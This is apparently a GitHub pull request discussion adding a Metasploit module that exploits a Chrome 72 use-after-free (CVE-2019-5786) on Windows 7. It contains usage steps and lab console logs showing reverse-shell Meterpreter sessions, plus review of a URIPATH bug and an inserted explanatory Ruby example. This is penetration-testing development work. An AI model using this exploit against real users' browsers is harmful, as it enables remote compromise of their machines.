Add CVE-2019-5786, exploit for Chrome 72.0.3626.119 on Windows 7 x86 #11816

Merged
merged 2 commits into from May 8, 2019

@timwr
Contributor

commented May 6, 2019

This exploit takes advantage of a use-after-free vulnerability in Google Chrome 72.0.3626.119 running on Windows 7 x86. Written by @exodusintel.
Additional memory protections mean this exploit technique is not as straightforward on x64 versions of Windows. Additionally, the sandbox must be disabled.

In the wild I believe this used CVE-2019-0808 to escape the sandbox, but I'm unsure how to chain the vulnerabilities together.

Verification

  1. Install Chrome 72.0.3626.119 on Windows 7 x86, disable chrome auto-update.
  2. C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox
  3. Start msfconsole
  4. Do: use exploit/windows/browser/chrome_filereader_uaf
  5. Do: Choose a payload and set any specific options
  6. Do: run. After a target browses to the generated URL, you should receive a session.

@timwr timwr added the module label May 6, 2019

@wchen-r7 wchen-r7 self-assigned this May 7, 2019

@wchen-r7

Contributor

commented May 7, 2019

Love it. Can't wait to take a look at this PR. Nice job @timwr

@wchen-r7 wchen-r7 added the docs label May 7, 2019

@timwr

Contributor Author

commented May 8, 2019

Any idea how I can chain a second vulnerability from shellcode on Windows? Maybe with metasm or the reflective loader?
https://github.com/ze0r/cve-2019-0808-poc/blob/master/win7_x86/exp/exp.cpp

@bcoles

Contributor

commented May 8, 2019

Software link:

hxxps://redirector[.]gvt1[.]com/edgedl/release2/chrome/AMavr_Q0teHn_72.0.3626.119/72.0.3626.119_chrome_installer.exe
72.0.3626.119 (Official Build) (32-bit)
      send_response(cli, 'onmessage = function (msg) { }')
    else
      uripath = datastore['URIPATH']
      uripath += '/' unless uripath[-1] == '/'

@bcoles

bcoles May 8, 2019

Contributor

This is buggy. URIPATH may be nil.

msf5 exploit(windows/browser/chrome_filereader_uaf) > [*] 172.16.191.153   chrome_filereader_uaf - Sending /Qugl6Y
[-] 172.16.191.153   chrome_filereader_uaf - Exception handling request: undefined method `[]' for nil:NilClass

I modified it like so:

      uripath = datastore['URIPATH'].to_s
      uripath += '/' unless uripath.end_with? '/'

Which fixes the error, but is still problematic. If URIPATH is not set, uripath will end up as /, which causes subsequent loading of resources to fail. I.e., iframe.src = '#{uripath}exploit.html'; attempts to load /exploit.html instead of /uniquepath/exploit.html.

@wchen-r7

wchen-r7 May 8, 2019

Contributor

I noticed the same bugs as well.

@wchen-r7

wchen-r7 May 8, 2019

Contributor

I think this does the trick:

      uripath = datastore['URIPATH'] || get_resource
      uripath += '/' unless uripath.end_with? '/'
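The following is an added example written for this page, not code from the Metasploit module under review. It models the three versions of the URIPATH handling discussed in this review thread so the failure modes can be run side by side: the original version that raises on a nil URIPATH, the .to_s patch that silently collapses an unset path to the server root, and the landed fix that falls back to the registered resource path. The names are stand-ins: `configured` plays the role of datastore['URIPATH'] and `registered` plays the role of the value get_resource returns (the random path such as /Qugl6Y seen in the log above). The last helper goes beyond the thread by also treating an empty or whitespace-only URIPATH as unset, which the `||` fix does not, since Ruby treats "" as truthy.

```ruby
# Added example, not the module's own code: the three URIPATH variants from
# the review thread, plus one added generalisation.
#
# Assumed stand-ins: `configured` ~ datastore['URIPATH'] (nil when unset),
# `registered` ~ the value of get_resource (the path the HTTP server
# registered for the module, e.g. "/Qugl6Y").

# Version 1, as originally submitted: indexes the string without a nil check,
# so an unset URIPATH raises NoMethodError ("undefined method `[]' for nil").
def uripath_original(configured)
  uripath = configured
  uripath += '/' unless uripath[-1] == '/'
  uripath
end

# Version 2, the .to_s patch: no longer raises, but nil becomes "" and then
# "/", so every sub-resource is requested from the server root.
def uripath_to_s(configured)
  uripath = configured.to_s
  uripath += '/' unless uripath.end_with?('/')
  uripath
end

# Version 3, the fix that was landed: fall back to the registered resource
# path when URIPATH is unset. Caveat: "" is truthy in Ruby, so an explicitly
# empty URIPATH would still collapse to "/".
def uripath_fixed(configured, registered)
  uripath = configured || registered
  uripath += '/' unless uripath.end_with?('/')
  uripath
end

# Added generalisation (not from the thread): treat nil, empty and
# whitespace-only values as unset, and also guarantee a leading slash.
def uripath_robust(configured, registered)
  base = configured.to_s.strip
  base = registered if base.empty?
  base = '/' + base unless base.start_with?('/')
  base += '/' unless base.end_with?('/')
  base
end

# The relative URL the landing page would embed for a sub-resource.
def resource_url(uripath, file)
  "#{uripath}#{file}"
end

if __FILE__ == $PROGRAM_NAME
  registered = '/Qugl6Y' # constructed sample value in the format of the log above
  [nil, '/chrome', '', 'chrome/'].each do |cfg|
    original = begin
      uripath_original(cfg)
    rescue NoMethodError => e
      "raises #{e.class}"
    end
    puts "URIPATH=#{cfg.inspect}: original=#{original.inspect} " \
         "to_s=#{uripath_to_s(cfg).inspect} " \
         "fixed=#{uripath_fixed(cfg, registered).inspect} " \
         "robust=#{uripath_robust(cfg, registered).inspect}"
  end
end
```

Running the script with an unset URIPATH shows why the console log above reported a NoMethodError for version 1 and why version 2 would have requested /exploit.html from the root; version 3 yields /Qugl6Y/exploit.html, matching the working run later in the thread.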
@bcoles

Contributor

commented May 8, 2019


Worked on second attempt:

# ./msfconsole 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

   _______________                        |*\_/*|________
  |  ___________  |     .-.     .-.      ||_/-\_|______  |
  | |           | |    .****. .****.     | |           | |
  | |   0   0   | |    .*****.*****.     | |   0   0   | |
  | |     -     | |     .*********.      | |     -     | |
  | |   \___/   | |      .*******.       | |   \___/   | |
  | |___     ___| |       .*****.        | |___________| |
  |_____|\_/|_____|        .***.         |_______________|
    _|__|/ \|_|_.............*.............._|________|_
   / ********** \                          / ********** \
 /  ************  \                      /  ************  \
--------------------                    -------------------


       =[ metasploit v5.0.21-dev-5a07d280d2               ]
+ -- --=[ 1909 exploits - 1067 auxiliary - 330 post       ]
+ -- --=[ 553 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/windows/browser/chrome_filereader_uaf 
msf5 exploit(windows/browser/chrome_filereader_uaf) > set verbose true
verbose => true
msf5 exploit(windows/browser/chrome_filereader_uaf) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(windows/browser/chrome_filereader_uaf) > set uripath
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore

msf5 exploit(windows/browser/chrome_filereader_uaf) > set uripath /chrome
uripath => /chrome
msf5 exploit(windows/browser/chrome_filereader_uaf) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/chrome
[*] Local IP: http://172.16.191.165:8080/chrome
[*] Server started.
msf5 exploit(windows/browser/chrome_filereader_uaf) > [*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/exploit.html
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/worker.js
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/exploit.html
[*] 172.16.191.153   chrome_filereader_uaf - Sending /chrome/worker.js
[*] Sending stage (179779 bytes) to 172.16.191.153
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.153:49170) at 2019-05-08 05:38:47 -0400

msf5 exploit(windows/browser/chrome_filereader_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-7-ULTIMATE-\user
meterpreter > shell
Process 3588 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\AppData\Local\Google\Chrome\Application\72.0.3626.119>hostname
hostname
WIN-7-ULTIMATE-SP1-X86

C:\Users\user\AppData\Local\Google\Chrome\Application\72.0.3626.119>
@wchen-r7

Contributor

commented May 8, 2019

Any idea how I can chain a second vulnerability from shellcode on Windows? Maybe with metasm or the reflective loader?

Metasm is cool when you make it work, but my dev experience with Metasm has always been kind of unpleasant because it creates unpredictable results sometimes. I could be biased though.

@wchen-r7

Contributor

commented May 8, 2019

Works for me and reliable!

msf5 exploit(windows/browser/chrome_filereader_uaf) > rerun
[*] Reloading module...
[*] Exploit running as background job 11.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.85.1:4444 
msf5 exploit(windows/browser/chrome_filereader_uaf) > [*] Using URL: http://172.16.85.1:8080/5Fczuw
[*] Server started.
[*] 172.16.85.143    chrome_filereader_uaf - Sending /5Fczuw
[*] 172.16.85.143    chrome_filereader_uaf - Sending /5Fczuw/exploit.html
[*] 172.16.85.143    chrome_filereader_uaf - Sending /5Fczuw/worker.js
[*] Sending stage (180291 bytes) to 172.16.85.143
[*] Meterpreter session 2 opened (172.16.85.1:4444 -> 172.16.85.143:1375) at 2019-05-08 11:16:59 -0500
@wchen-r7

Contributor

commented May 8, 2019

So code to me looks okay. I'll go ahead and fix the get_resource bug and then land it. Thank you @timwr

@wchen-r7 wchen-r7 merged commit 8b489f4 into rapid7:master May 8, 2019

2 of 3 checks passed

Metasploit Automation - Sanity Test Execution: Failed to pass tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wchen-r7 added a commit that referenced this pull request May 8, 2019

@wchen-r7

Contributor

commented May 8, 2019

Release Notes

The windows/browser/chrome_filereader_uaf exploit module has been added to the framework. This module exploits a use-after-free vulnerability in Google Chrome's FileReader API. The exploit specifically targets x86 Windows 7.

msjenkins-r7 added a commit that referenced this pull request May 8, 2019

@ddouhine

Contributor

commented May 9, 2019

Very excited by this UaF in Chrome but unfortunately it doesn't work for me.
I probably have missed something...

Screenshot 2019-05-09 at 20 27 26

Screenshot 2019-05-09 at 20 25 57

Screenshot 2019-05-09 at 20 25 34

Screenshot 2019-05-09 at 20 25 06

@timwr

Contributor Author

commented May 10, 2019

Did you try refreshing a few times? It was a little unreliable for me. What's the OS? Windows 7 x86?
Can you see the Console logs in the inspector?
Maybe we can jump on slack and debug it together.

@timwr timwr deleted the timwr:cve_2019_5786 branch May 10, 2019

@ddouhine

Contributor

commented May 10, 2019

Yes, I've tried many times.
OS is W7 SP1 x86.
Screenshot 2019-05-10 at 10 51 12

And here is what I get in the console logs:
Screenshot 2019-05-10 at 10 53 42

Of course I will be glad to debug it with you. I'll ping you on Slack.
Thx :)

@timwr
Contributor Author

left a comment

      }
      function brute() {
        window.setTimeout(iter, 1000);

@timwr

timwr May 10, 2019

Author Contributor

@ddouhine try removing this line (window.setTimeout).

@wchen-r7

Contributor

commented May 17, 2019

@timwr timwr referenced this pull request May 23, 2019

Open

BSOD on Windows 7 x86 #1
